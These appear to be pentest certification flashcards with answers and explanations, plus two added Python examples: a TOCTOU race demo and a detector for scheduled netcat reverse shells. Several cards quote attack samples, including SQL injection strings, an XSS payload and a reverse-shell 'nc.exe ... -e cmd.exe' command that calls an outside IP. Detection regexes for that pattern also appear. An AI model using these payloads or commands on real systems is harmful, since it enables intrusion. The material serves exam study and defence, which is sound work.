C.g++ exploit.cpp -o notepad.exe
D.g++ exploit.py -o notepad.exe

A

C.g++ exploit.cpp -o notepad.exe

Explanation:
OBJ-2.4: g++ is a free C++ compiler that is available across a wide variety of operating systems and is installed by default as part of Kali Linux. The proper syntax to compile a C++ file (*.cpp) is “g++ filename -o outputfile”, so “g++ exploit.cpp -o notepad.exe” is correct.

40
Q

What type of technique does exploit chaining often implement?
A.Injecting parameters into a connection string using semicolons as a separator
B.Inserting malicious JavaScript code into input parameters
C.Setting a user's session identifier (SID) to an explicit known value
D.Adding multiple parameters with the same name in HTTP requests

A

A.Injecting parameters into a connection string using semicolons as a separator

Explanation:
OBJ-2.4: Connection String Parameter Pollution (CSPP) exploits specifically the semicolon-delimited database connection strings that are constructed dynamically based on the user inputs from web applications. CSPP, if carried out successfully, can be used to steal user identities and hijack web credentials. CSPP is a high-risk attack because of the relative ease with which it can be carried out (low access complexity) and the potential results it can have (high impact). Exploit chaining involves multiple commands and exploits being conducted in a series to attack or exploit a given target fully.

41
Q

You have received a laptop from a user who recently left the company. You went to the terminal in the operating system and typed ‘history’ into the prompt and see the following:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> for i in $(seq 255); do ping -c 1 10.1.0.$i; done
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following best describes what actions were performed by this line of code?
A.Conducted a ping sweep of the subnet
B.Sequentially sent 255 ping packets to every host on the subnet
C.Attempted to conduct a SYN scan on the network
D.Conducted a sequential ICMP echo reply to the subnet

A

A.Conducted a ping sweep of the subnet

Explanation:
OBJ-2.1: This code is performing a ping sweep of the subnet 10.1.0.0/24. The code states that for every number in the sequence from 1 to 255, conduct a ping to 10.1.0.x, where x is the number from 1 to 255. When it completes this sequence, it is to return to the terminal prompt (done). The ping command uses an echo request and then receives an echo reply from the ping’s target. A ping sweep does not use a SYN scan, which would require the use of a tool like nmap or hping.

42
Q
Windows file servers commonly hold sensitive files, databases, passwords, and more. What common vulnerability is usually used against a Windows file server to expose sensitive files, databases, and passwords?
A.SQL Injection
B.CRLF Injection
C.Missing patches
D.Cross-site scripting
A

C.Missing patches

Explanation:
OBJ-2.3: Missing patches are the most common vulnerability found on both Windows and Linux systems. When a security patch is released, attackers begin to reverse engineer the security patch to exploit the vulnerability. If your servers are not patched against the vulnerability, they can become victims of the exploit, and the server’s data can become compromised. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. Cross-site scripting focuses on exploiting a user’s workstation, not a server. CRLF injection is a software application coding vulnerability that occurs when an attacker injects a CRLF character sequence where it is not expected. SQL injection is the placement of malicious code in SQL statements via web page input. SQL injection is commonly used against databases, but it is not useful when attacking file servers.

43
Q
What is not an example of a type of support resource that a pentester might receive as part of a white box assessment?
A.SOAP Project Files
B.XSD
C.network diagram
D.PII of employees
A

D.PII of employees

Explanation:
OBJ-1.1: White box support resources include architectural diagrams, sample application requests, SDK documentation, SOAP project files, Swagger documents, WSDL/WADL, and XML Schema Definitions (XSD). The PII of employees should not be given to a penetration tester as this could violate laws and regulations regarding maintaining the confidentiality and privacy of employee data. White-box testing falls on the opposite end of the spectrum from black-box testing, and penetration testers are given full access to source code, architecture documentation, and so forth.

44
Q
What should NOT be included in your final report for the assessment and provided to the organization?
A.Executive summary
B.Methodology used
C.Findings and recommendations
D.Detailed list of costs incurred
A

D.Detailed list of costs incurred

Explanation:
OBJ-5.1: A detailed list of costs incurred is not required as part of the final report but instead would be included as part of your invoicing. Your report should contain an executive summary, your methodology used in the assessment, and your findings and prioritized recommendations.

45
Q

A cybersecurity analyst is applying for a new job with a penetration testing firm. He received the job application as a secured Adobe PDF file, but unfortunately, the firm locked the file with a password so the potential employee cannot fill in the application. Instead of asking for an unlocked copy of the document, the analyst decides to write a script in Python to attempt to unlock the PDF file by using passwords from a list of commonly used passwords until he can find the correct password or attempts every password in his list. Based on this description, what kind of cryptographic attack did the analyst perform?

A.Man-in-the-middle attack
B.Dictionary attack
C.Session hijacking
D.Brute-force attack

A

B.Dictionary attack

Explanation:
OBJ-2.4: A dictionary attack is a technique for defeating a cipher or authentication mechanism by trying to determine its decryption key or passphrase by trying hundreds or sometimes millions of likely possibilities, such as words in a dictionary. The key to answering this question is that they were using passwords from a list. In cryptography, a brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. A dictionary attack is a specific form of a brute-force attack that uses a list. A session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the webserver. A man-in-the-middle attack (MITM), also known as a hijack attack, is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other.

46
Q

You have conducted a Google search for “site:webserver.com -site:sales.webserver.com financial”. What results do you expect to receive?
A.Google results matching financial in domain webserver.com, but no results from the site sales.webserver.com
B.Google results for keyword matches from the site sales.diontraining.com that are in the domain diontraining.com but do not include the word financial
C.Google results matching all words in the query
D.Google results for keyword matches on diontraining.com and sales.diontraining.com that include the word financial

A

A.Google results matching financial in domain webserver.com, but no results from the site sales.webserver.com

Explanation:
OBJ-2.1: When conducting a Google search, using site:AAA in the query will return results only from that website (AAA). If you use -site:AAA, you will get results not explicitly on the website (AAA). In the case of this question, no results should show up from sales.webserver.com. All results should only come from diontraining.com.

47
Q

(where email=support@diontraining.com and password=‘ or 7==7’)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What type of attack is being performed?
A.Cross-site scripting
B.XML Injection
C.SQL Injection
D.Header manipulation

A

C.SQL Injection

Explanation:
OBJ-3.4: SQL injection is a code injection technique that is used to attack data-driven applications. SQL injections are conducted by inserting malicious SQL statements into an entry field for execution. For example, an attacker may try to dump the contents of the database by using this technique. A common SQL injection technique is to insert an always true statement, such as 1 == 1, or in this example, 7 == 7. Header manipulation is the insertion of malicious data, which has not been validated, into an HTTP response header. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic. The injection of unintended XML content and/or structures into an XML message can alter the application’s intended logic. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user.

48
Q
What should administrators perform to reduce a system's attack surface and remove unnecessary software, services, and insecure configuration settings?
A.Hardening
B.Harvesting
C.Windowing
D.Stealthing
A

A.Hardening

Explanation:
OBJ-5.3: Hardening is usually the process of securing a system by reducing its surface of vulnerability, which is larger when a system performs more functions; in principle, a single-function system is more secure than a multipurpose one. Reducing available ways of attack typically includes changing default passwords, removing unnecessary software, removing unnecessary usernames or logins, and disabling or removing unnecessary services. Windowing is the use of windows for the simultaneous display of more than one item on a screen. Harvesting is the process of gathering data, normally user credentials. Stealthing is a made-up term in this question.

49
Q

Your team is developing an update to a piece of code that allows customers to update their billing and shipping addresses in the web application. The shipping address field used in the database was designed with a limit of 75 characters. Your team’s web programmer has brought you some algorithms that may help prevent an attacker from trying to conduct a buffer overflow attack by submitting invalid input to the shipping address field. Which pseudo-code represents the best solution to prevent this issue?
A.if (shippingAddress <= 75) (update field) else exit
B.if (shippingAddress != 75) (update field) else exit
C.if (shippingAddress = 75) (update field) else exit
D.if (shippingAddress >= 75) (update field) else exit

A

A.if (shippingAddress <= 75) (update field) else exit

Explanation:
OBJ-3.4: To ensure that the field is not overrun by an input that is too long, input validation must occur. Checking if the shipping address is less than or equal to 75 characters before updating the field will prevent a buffer overflow from occurring in this program. If the input is 76 characters or more, then the field will not be updated, and the algorithm will exit the function.

50
Q

String query = "SELECT * FROM courses WHERE courseID='" + request.getParameter("id") + "' AND certification='" + request.getParameter("certification") + "'";
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
If an attacker wanted to get a complete copy of the courses table and was able to substitute arbitrary strings for “id” and “certification”, which of the following strings allow this to occur?
A. id = "1' OR '1'=='1"
B. certification = "cysa' OR '1' =='1"
C. id = "1' OR '1' == '1" and certification = "cysa' OR '1'=='1"
D. id = "1' OR '1' ==1" and certification = "cysa' OR '1=='1"

A

C. id = "1' OR '1' == '1" and certification = "cysa' OR '1'=='1"

Explanation:
OBJ-3.4: ID and certification must be crafted so that when substituted for the getParameter fields, the SQL statement formed is still complete and will return a Boolean value of true for the ENTIRE statement every time it is evaluated. The AND in the middle of the WHERE clause indicates that both the courseID portion and the certification portion must be true for the whole clause to be true in every case. When this occurs, the entire table of courses would be returned. The only string that would ensure both halves of the WHERE clause always return true would be

51
Q
What type of threat actor is highly funded and often backed by nation-states?
A.Hacktivist
B.Script Kiddies
C.Insider Threat
D.APT
A

D.APT

Explanation:
OBJ-1.3: Advanced Persistent Threats are a group of hackers with great capability and intent. Nation-states and other large organizations often fund them to conduct highly covert hacks over a long period of time for political or economic gain. Script kiddies are people who use existing computer scripts or code to hack into computers, lacking the expertise to write their own. An insider threat is a malicious threat to an organization from people within the organization, such as employees, former employees, contractors, or business associates, who have inside information concerning the organization’s security practices, data, and computer systems. A hacktivist is someone who uses hacking to bring about political and social change.

52
Q

You have run a vulnerability scan and received the following output:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

CVE-2011-3389
QID 42366 - SSLv3.0/TLSv1.0 Protocol weak CBC mode Server side vulnerability
Check with: openssl s_client -connect login.diontraining.com:443 - tls -cipher “AES:CAMELLISA:SEED:3DES:DES”

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following categories should this be classified as?
A.Web application cryptography vulnerability
B.Active Directory encryption vulnerability
C.VPN Tunnel Vulnerability
D.PKI transfer vulnerability

A

A.Web application cryptography vulnerability

Explanation:
OBJ-2.2: This vulnerability should be categorized as a web application cryptographic vulnerability. This is shown by the weak SSLv3.0/TLSv1.0 protocol being used in cipher block chaining (CBC) mode. Specifically, the use of the 3DES and DES algorithms during negotiation is a significant vulnerability. A stronger protocol should be used, such as forcing the use of AES.

53
Q

<IMG SRC=vbscript:msgbox("Vulnerable_to_Attack");> originalAttribute="SRC" originalPath="vbscript:msgbox("Vulnerable_to_Attack ");>"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
When you click submit on the search form, your web browser returns a pop-up window that displays Vulnerable_to_Attack. Which of the following vulnerabilities did you discover in the web application?
A.Cross-site scripting
B.Command injection
C.Cross-site Request Forgery
D.SQL Injection

A

A.Cross-site scripting

Explanation:
OBJ-3.4: This is a form of Cross-Site Scripting (XSS). Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. Attackers may use a cross-site scripting vulnerability to bypass access controls such as the same-origin policy. Cross-site request forgery (CSRF or XSRF) is a malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. There are many ways in which a malicious website can transmit commands, such as specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests, all of which can work without the user’s interaction or even knowledge. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. Command injection is an attack in which the goal is to execute arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell.

54
Q
During a penetration test, you find a hash value related to malware associated with an APT. What best describes what you have found?
A.Botnet
B.Indicator of compromise
C.XSRF
D.SQL Injection
A

B.Indicator of compromise

Explanation:
OBJ-5.4: An indicator of compromise is an artifact observed on a network or in an operating system that, with high confidence, indicates a computer intrusion. Typical IOCs are virus signatures and IP addresses, MD5 hashes of malware files or URLs, or botnet command and control servers’ domain names. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. Cross-site request forgery (CSRF or XSRF) is a malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. There are many ways in which a malicious website can transmit commands, such as specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests, all of which can work without the user’s interaction or even knowledge. A botnet consists of many Internet-connected devices, each of which is running one or more bots. Botnets can be used to perform Distributed Denial-of-Service (DDoS) attacks, steal data, send spam, and allow the attacker to access the device and its connection.

55
Q

[12Nov2020 10:07:23] “GET /logon.php?user=test’+oR+7>1%20—HTTP/1.1” 200 5825
[12Nov2020 10:10:03] “GET /logon.php?user=admin’;%20—HTT{/1.1” 200 5845
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The analyst contacts the web developer and asks for a copy of the source code to the logon.php script. The script is as follows:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
<?php
include('../../config/db_connect.php');
$user = $_GET['user'];
$pass = $_GET['pass'];
$sql = "SELECT * FROM USERS WHERE username = '$user' AND password = '$pass'";
$result = mysql_query($sql) or die ("couldn't execute query");

if (mysql_num_rows($result) != 0) echo 'Authentication granted!';
else echo 'Authentication failed!';
?>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Based on source code analysis, which type of vulnerability is this web server vulnerable to?
A.SQL Injection
B.Command Injection
C.Directory Traversal
D.LDAP Injection
A

A.SQL Injection

Explanation
OBJ-3.4: Based on the log entries, it appears the attack was successful in conducting a SQL injection. Notice the escape character (‘) used in the log. A connection to the MySQL database is being used in the script, which could be exploited since no input validation is being performed. Command injection is an attack in which the goal is to execute arbitrary commands on the host operating system via a vulnerable application. SQL injection is a specific type of command injection. LDAP injection is a code injection technique used to exploit web applications that could reveal sensitive user information or modify information represented in the LDAP (Lightweight Directory Access Protocol) data stores. Directory traversal or Path Traversal is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server’s root directory.

56
Q
A recently hired security employee at a bank was asked to perform daily scans of the bank's intranet in order to look for unauthorized devices. The new employee decides to create a script that scans the network for unauthorized devices every morning at 2:00 am. Which programming language would work best to create this script?
A.C#
B.PHP
C.Python
D.ASP.NET
A

C.Python

Explanation
OBJ-4.4: Python is a commonly used scripting language used in cybersecurity. PHP is used as a scripting language for web applications. C# and ASP.NET are both compiled languages, not scripting languages.

57
Q
An attacker uses the nslookup interactive mode to locate information on a Domain Name Service (DNS). What command should they type to request the appropriate records for only name servers?
A.locate type=ns
B.transfer type=ns
C.request type=ns
D. set type=ns
A

D. set type=ns

Explanation:
OBJ-4.2: The “set type=ns” command tells nslookup to report information only on name servers. If you used “set type=mx” instead, you would receive information only about mail exchange servers.

58
Q
What kind of security vulnerability would a newly discovered flaw in a software application be considered?
A.Input validation flaw
B.Time-to-check to time-to-use flaw
C.HTTP header injection vulnerability
D.Zero-day vulnerability
A

D.Zero-day vulnerability

Explanation:
OBJ-3.1: A zero-day vulnerability is a newly discovered flaw in software that is unknown to the vendor, so no patch exists yet; it can be exploited before the vendor becomes aware of it and can fix it. An input validation flaw is a weakness in how an application checks what a user supplies, and an input validation attack exploits it by entering crafted or malformed data into a normal input field. HTTP header injection vulnerabilities occur when user input is insecurely included within server response headers. A time-of-check to time-of-use (TOCTOU) flaw is a class of software bug caused by a change in the system between checking a condition (such as a security credential or a file's attributes) and using the result of that check; it is an example of a race condition.

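
Added example, not part of the flashcards: the time-of-check to time-of-use race named in the explanation, shown as a vulnerable routine beside a hardened one. The scenario is hypothetical: a privileged service reads a file on a user's behalf after checking that the path is a regular file, and the `race` hook stands in for an attacker who swaps that path for a symlink between the check and the open. Everything is created in a temporary directory; it assumes a POSIX system (O_NOFOLLOW).

```python
"""TOCTOU: check-then-open (racy) versus open-then-fstat (no window).
The race is injected deterministically through a callback for the demo."""
import os
import stat
import tempfile
from typing import Callable, Dict, Optional

Hook = Optional[Callable[[], None]]


def read_check_then_open(path: str, race: Hook = None) -> bytes:
    """Vulnerable: inspects the *name*, then opens the *name* again."""
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode):           # check: refuse symlinks etc.
        raise PermissionError(f"{path}: not a regular file")
    if race:
        race()                                 # the gap an attacker races into
    with open(path, "rb") as f:                # use: may now be a different object
        return f.read()


def read_open_then_check(path: str, race: Hook = None) -> bytes:
    """Hardened: open without following symlinks, then validate the object
    actually opened via its descriptor, which nobody can swap underneath us."""
    if race:
        race()
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)   # fails (ELOOP) on a symlink
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            raise PermissionError(f"{path}: not a regular file")
        f = os.fdopen(fd, "rb")                # file object now owns fd
    except BaseException:
        os.close(fd)
        raise
    with f:
        return f.read()


def demo() -> Dict[str, object]:
    """Run both readers with the swap injected; return what each produced."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secret")     # the file the caller must not read
        public = os.path.join(d, "public")     # the file the caller asked for
        with open(secret, "wb") as f:
            f.write(b"TOP SECRET")

        def reset() -> None:
            if os.path.lexists(public):
                os.remove(public)
            with open(public, "wb") as f:
                f.write(b"harmless")

        def swap() -> None:                    # attacker: replace file with symlink
            os.remove(public)
            os.symlink(secret, public)

        out: Dict[str, object] = {}
        reset()
        out["baseline"] = read_open_then_check(public)
        reset()
        out["check_then_open"] = read_check_then_open(public, race=swap)
        reset()
        try:
            out["open_then_check"] = read_open_then_check(public, race=swap)
        except OSError:
            out["open_then_check"] = "refused"
        return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:16} -> {value!r}")
```

The classic real-world instance is access(2) followed by open(2) in a setuid program. The general remedy is the one shown: make the authorization decision on the object you actually opened (fstat, fchmod, fchown on the descriptor) or drop privileges before opening, because any check made on a path name can be invalidated before the name is used.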
59
Q
Which type of method is used to collect information during passive reconnaissance?
A.Network traffic sniffing
B.Man in the middle attacks
C.Publicly accessible sources
D.Social engineering
A

C.Publicly accessible sources

Explanation:
OBJ-2.1: Passive reconnaissance focuses on collecting information that is widely and openly available from publicly accessible sources, without sending anything to the target. Although listening to network traffic with a sniffer is itself passive, gaining access to the network to place the sniffer in a useful tap location is not, so of the choices provided, publicly accessible sources is the best answer. A man-in-the-middle attack puts the penetration tester between the traffic's source and destination, which permits active interception and possible modification. Social engineering is also an active reconnaissance technique: it uses deception to trick a user into giving information to the attacker or penetration tester.

60
Q
What is a legal contract outlining the confidential material or information that will be shared by the pentester and the organization during an assessment?
A.NDA
B.SOW
C.MSA
D.Corporate Policy
A

A.NDA

Explanation:
OBJ-1.2: This is the definition of a non-disclosure agreement (NDA). There may be two NDAs in use: one from the organization to the pentester and another from the pentester to the organization. A statement of work (SOW) is a formal document stating what will and will not be performed during a penetration test; it should also contain the size and scope of the assessment and a list of the assessment's objectives. A master service agreement (MSA) is a contract between parties in which they agree to most of the terms that will govern future transactions or future agreements. The MSA is used when a pentester will be on retainer for a multi-year contract, and an individual SOW is then issued for each assessment to define its scope. Corporate policy is a documented set of broad guidelines, formulated after analyzing all internal and external factors that can affect an organization's objectives, operations, and plans.

61
Q

During a penetration test, you conduct an exploit that creates a denial of service condition by crashing the httpd server. What should you do?
A.Pivot to another machine
B.Immediately contact the organization and inform them of the issue
C.Continue with the exploitation
D.Contact the organization's customer service department and conduct further information gathering

A

B.Immediately contact the organization and inform them of the issue

Explanation:
OBJ-5.4: If at any point during an assessment an issue arises from your actions, you should immediately stop exploitation and contact the trusted point of contact provided by the organization. Do not continue the exploitation or pivot to another machine. You may contact the organization's customer service department only if that is part of the communication procedures agreed in the assessment plan; in a red team engagement the customer service team may itself be a target and would not be told about the issue directly. As a pentester, you notify your trusted point of contact within the organization, per your approved test plan.

62
Q
What tool is used to collect wireless packet data?
A.John the Ripper
B.Netcat
C.Nessus
D.Aircrack-ng
A

D.Aircrack-ng

Explanation:
OBJ-3.3: Aircrack-ng is a complete suite of wireless security assessment and exploitation tools that covers monitoring, attacking, testing, and cracking of wireless networks. Its capture component, airodump-ng, writes the 802.11 frames it collects to pcap files that other tools can read, or to text (CSV) files. John the Ripper is a password cracking tool. Nessus is a vulnerability scanner. Netcat is a general-purpose TCP/UDP utility, commonly used to open a reverse shell from a compromised machine back to the attacker.

63
Q
What type of malicious application does not require user intervention or another application to act as a host to replicate?
A.Macro
B.Worm
C.Trojan
D.Virus
A

B.Worm

Explanation:
OBJ-3.1: A worm is a self-replicating type of malware that does not require user intervention or another application to act as a host for it to replicate. Viruses and macro viruses require user intervention (running an infected program or opening an infected document) to spread, and a Trojan is malicious code hosted within another application that appears harmless.

64
Q
What technique is most effective in determining whether or not increasing end-user security training would benefit the organization during your technical assessment of their network?
A.Network sniffing
B.Application security testing
C.Social Engineering
D.Vulnerability scanning
A

C.Social Engineering

Explanation:
OBJ-3.1: Social engineering is the psychological manipulation of people into performing actions or divulging confidential information. During your technical assessment, social engineering techniques such as phishing or pharming let you measure how users actually respond, which shows whether additional end-user security training would benefit the organization. The other three options test technical controls only, so end-user training would not affect their results.

65
Q
What activity is not a part of the post-engagement cleanup?
A.Removing tools
B.Removing shells
C.Removing tester-created credentials
D.Modifying log files
A

D.Modifying log files

Explanation:
OBJ-5.2: Modifying log files is not part of post-engagement cleanup. A pentester rarely has any need to alter the client's logs and should not do so after the assessment: they are the client's record of what happened during the engagement. When an assessment is complete, the pentester should remove any shells, tester-created credentials, and tools from the hosts that were compromised, so that a real attacker cannot reuse them against the organization.

66
Q

BEGIN OUTPUT
——————————
# nmap win2k16.local
Nmap scan report for win2k16 (192.168.2.15)
Host is up (0.132452s latency)
Not shown: 997 closed ports

PORT STATE SERVICE 
22/tcp open ssh 
80/tcp open http   
# nc win2k16.local 80 
220 win2k16.local DionTraining SMTP Server (Postfix/2.4.1)   
# nc win2k16.local 22 
SSH-2.0-OpenSSH_7.2 Debian-2   

——————————
END OUTPUT
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
A.Your web server has been compromised
B.Your email server has been compromised
C.Your organization has a vulnerable version of the SSH server software installed
D.Your email server is running on a non-standard port

A

D.Your email server is running on a non-standard port

Explanation:
OBJ-2.2: The nmap output shows only two open ports, 22 and 80, and labels them ssh and http. Without -sV, that SERVICE column is just nmap's default name for the port number, not the result of talking to the listener. Connecting to port 80 with netcat shows what is really there: the banner is an SMTP greeting (a 220 response from Postfix), so the mail server is answering on port 80 rather than its default of port 25. That is all the output proves. It does not show that the web or email server has been compromised, and a version string in the SSH banner is not by itself evidence that the SSH build is vulnerable.

67
Q
Which of the following items represents a document that includes detailed information on when an incident was detected, how impactful the incident was, how it was remediated, the effectiveness of the incident response, and any identified gaps that might require improvement?
A.Forensic analysis report
B.Trends analysis report
C.Lessons learned report
D.Chain of custody report
A

C.Lessons learned report

Explanation:
OBJ-5.2: The lessons learned report provides you with the details of the incident, its severity, the remediation method, and, most importantly, how effective your response was. Additionally, it provides recommendations for improvements in the future. A forensic analysis report would not provide recommendations for future improvements, even though it provides many of the other details. A trend analysis report describes whether behaviors have increased, decreased, or stayed the same over time. The chain of custody report is the chronological documentation or paper trail that records the custody, control, transfer, analysis, and disposition of physical or electronic evidence.

68
Q
What is not a step in the NIST SP 800-115 Methodology?
A.Reporting
B.Scoping
C.Discovery
D.Planning
A

B.Scoping

Explanation
OBJ-1.3: Scoping is not one of the four steps in the NIST SP 800-115 (Technical Guide to Information Security Testing and Assessment) methodology. The four steps are Planning, Discovery, Attack, and Reporting.

69
Q

You have just begun an investigation by reviewing the security logs. During the log review, you notice the following lines of code:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
sc config schedule start auto
net start schedule
at 10:42 "c:\temp\nc.exe 123.12.34.12 443 -e cmd.exe"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What BEST describes what is occurring and what action do you recommend to stop it?
A.The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory to create a remote connection to 123.12.34.12; you should recommend removing the host from the network
B.The host is beaconing to 123.12.34.12 every day at 10:42 by running nc.exe from the temp directory; you should recommend removing the host from the network
C.The host (123.12.34.12) is running nc.exe from the temp directory at 10:42 using the auto cron job remotely; No recommendation is required since this is not malicious activity
D.The host (123.12.34.12) is a rogue device on the network; you should recommend removing the host from the network

A

A.The host is using the Windows Task Scheduler at 10:42 to run nc.exe from the temp directory to create a remote connection to 123.12.34.12; you should recommend removing the host from the network

Explanation
OBJ-3.5: The first two commands set the Task Scheduler service (service name Schedule) to start automatically and then start it. The third uses the at command to create a scheduled task that runs netcat (nc.exe) from the c:\temp directory at 10:42. The -e cmd.exe option hands a command shell to whoever is on the other end of the connection, and the connection is made outbound to the attacker's machine at 123.12.34.12 on port 443, a port chosen so the traffic blends in with HTTPS: this is a reverse shell. Note that at without /every schedules a one-time job at the next 10:42, so the host is not beaconing daily; in either case the recommended action is to isolate the host from the network.
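
Added example, not part of the flashcards: detection logic for the persistence pattern in the log excerpt, run over constructed command-line log entries (the three lines from the card plus hypothetical benign and schtasks variants). It flags scheduled tasks that launch a netcat-style reverse shell, extracts the callback address for blocking, and records whether the job is one-time or recurring.

```python
"""Flag scheduled tasks that launch a netcat reverse shell.
SAMPLE_LOG is constructed: three lines from the card plus made-up neighbours."""
import re
from typing import Dict, List, Optional

SAMPLE_LOG = [
    'sc config schedule start auto',
    'net start schedule',
    'at 10:42 "c:\\temp\\nc.exe 123.12.34.12 443 -e cmd.exe"',
    'at 09:00 /every:M,T,W,Th,F "c:\\scripts\\backup.bat"',
    'schtasks /create /sc daily /tn Updater /tr "c:\\users\\public\\nc64.exe 10.9.8.7 8080 -e powershell.exe"',
    'schtasks /create /sc onlogon /tn Sync /tr "c:\\program files\\sync\\sync.exe"',
]

# Enabling/starting the Task Scheduler service: preparation, not proof by itself.
SCHEDULER_SERVICE = re.compile(r"^\s*(?:sc\s+config\s+schedule\b|net\s+start\s+schedule\b)", re.I)
SCHEDULER_CMD = re.compile(r"^\s*(?P<tool>at|schtasks)\b", re.I)
# netcat-family binary, then <host> <port>, then -e/-c <program> ("execute on connect").
REVERSE_SHELL = re.compile(
    r"(?P<bin>[^\s\"']*\bn(?:c64|cat|c)\.exe)\s+"
    r"(?P<host>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d{1,5})\b.*?"
    r"\s-(?:e|c)\s+(?P<shell>[^\s\"']+)",
    re.I,
)


def parse_task(line: str) -> Optional[Dict[str, object]]:
    """Return details if `line` schedules a reverse shell, else None."""
    tool = SCHEDULER_CMD.match(line)
    if not tool:
        return None
    rs = REVERSE_SHELL.search(line)
    if not rs:
        return None
    name = tool.group("tool").lower()
    if name == "at":
        # `at <time> "cmd"` fires once at the next <time>; only /every (or /next)
        # makes it a standing job.
        recurring = "/every:" in line.lower()
    else:
        sc = re.search(r"/sc\s+(\w+)", line, re.I)
        recurring = bool(sc) and sc.group(1).lower() != "once"
    return {
        "tool": name,
        "binary": rs.group("bin"),
        "callback": f"{rs.group('host')}:{rs.group('port')}",
        "shell": rs.group("shell"),
        "recurring": recurring,
        "line": line,
    }


def scan(lines: List[str]) -> Dict[str, list]:
    report: Dict[str, list] = {"scheduler_enabled": [], "reverse_shell_tasks": []}
    for line in lines:
        if SCHEDULER_SERVICE.match(line):
            report["scheduler_enabled"].append(line)
            continue
        hit = parse_task(line)
        if hit:
            report["reverse_shell_tasks"].append(hit)
    return report


def block_list(report: Dict[str, list]) -> List[str]:
    """Callback endpoints to block at egress while the host is isolated."""
    return sorted({h["callback"] for h in report["reverse_shell_tasks"]})


if __name__ == "__main__":
    r = scan(SAMPLE_LOG)
    for line in r["scheduler_enabled"]:
        print("scheduler prepared:", line)
    for h in r["reverse_shell_tasks"]:
        kind = "recurring" if h["recurring"] else "one-time"
        print(f"reverse shell via {h['tool']}: {h['binary']} -> {h['callback']} ({h['shell']}, {kind})")
    print("block:", block_list(r))
```

The binary-name match is deliberately narrow so the example stays readable; a production rule would also key on the -e/-c execute switch with any binary name (attackers rename nc.exe), and would pair the task creation with the outbound connection seen at the firewall.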

70
Q

While conducting a security test to ensure that information about your company’s web server is protected from inadvertent disclosure, you request an HTML file from the webserver and receive the following output:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/6.0
Date: Tuesday, 5 Sep 2017 10:34:12 GMT
Content-Type: text/html
Content-Length: 132

There is no web site configured at this address.

This page is a placeholder until construction begins.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following actions should you take to remediate this vulnerability?

A.Set “EnableLogging” to 1 in the URLScan.ini configuration file
B.Set “VerifyNormalization” to 1 in the URLScan.ini configuration file
C.Set “RemoveServerHeader” to 1 in the URLScan.ini configuration file
D.Set “PerProcessLogging” to 1 in the URLScan.ini configuration file

A

C.Set “RemoveServerHeader” to 1 in the URLScan.ini configuration file

Explanation:
OBJ-3.5: This output is an example of banner grabbing being conducted against your web server: the Server header announces the exact product and version (Microsoft-IIS/6.0). To stop that value from being sent, configure UrlScan, the security filter add-on for IIS, through its UrlScan.ini file. If you set “RemoveServerHeader” to 1, UrlScan removes the Server header from all responses, and the value of AlternateServerName is ignored. If you set “EnableLogging” to 1, UrlScan logs its actions in a file called UrlScan.log, created in the same directory that contains UrlScan.dll. If you set “PerProcessLogging” to 1, UrlScan appends the process ID of the IIS process hosting UrlScan.dll to the log file name, for example UrlScan.1234.log. If you set “VerifyNormalization” to 1, UrlScan verifies the URL’s normalization and defends against canonicalization attacks in which the URL contains a double-encoded string. Removing the header raises the bar rather than ending identification: the “Object Not Found” reason phrase and the default placeholder page are also characteristic of IIS, so a tester can often still fingerprint the server from the rest of the response. Please note, this question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulleted lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s complete content. Therefore, questions like this are fair game on test 